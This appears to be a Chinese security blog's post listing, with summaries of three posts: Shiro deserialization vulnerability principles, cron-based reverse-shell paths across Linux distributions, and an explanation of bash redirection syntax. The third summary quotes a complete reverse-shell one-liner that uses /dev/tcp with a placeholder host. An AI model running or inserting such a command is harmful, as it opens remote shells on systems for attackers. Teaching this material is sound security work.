- 博客(3)
- 收藏
- 关注
RSS订阅原创 全版本Shiro反序列化漏洞原理详解
本文为是作者耗时两个通宵写出的Shiro反序列化漏洞原理详解,主要涉及Shiro认证的一些基础概念以及为什么能够这样进行攻击。文章削弱了具体代码以及反序列化部分,主要强调很多新手宝宝看不懂(面试常考)的漏洞版本划分即利用区别等内容。因为反序列化部分其实是一个攻击大类,在利用中也只是把对应攻击链Poc进行加密,Shiro反序列化的根本我认为还是在如何能让服务器开始反序列化这一步,即伪造明文这一步。
2025-07-15 06:19:22
918
原创 计划任务反弹Shell命令在不同Linux系统的区别
在文件中(目录下可以放置额外的Crontab文件)Debian和Ubuntu:/var/spool/cron/crontabs/
2025-03-11 15:16:27
902
原创 nc反弹bash中 &>、0>&1是什么意思
本文结合一些参考文章以及作者个人理解解释Linux的bash反弹命令中的 &>、0>&1若观点有误,欢迎指出!目标讨论命令:bash -i >& /dev/tcp/ip/port 0>&1。
2024-05-23 22:06:50
1106
3
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人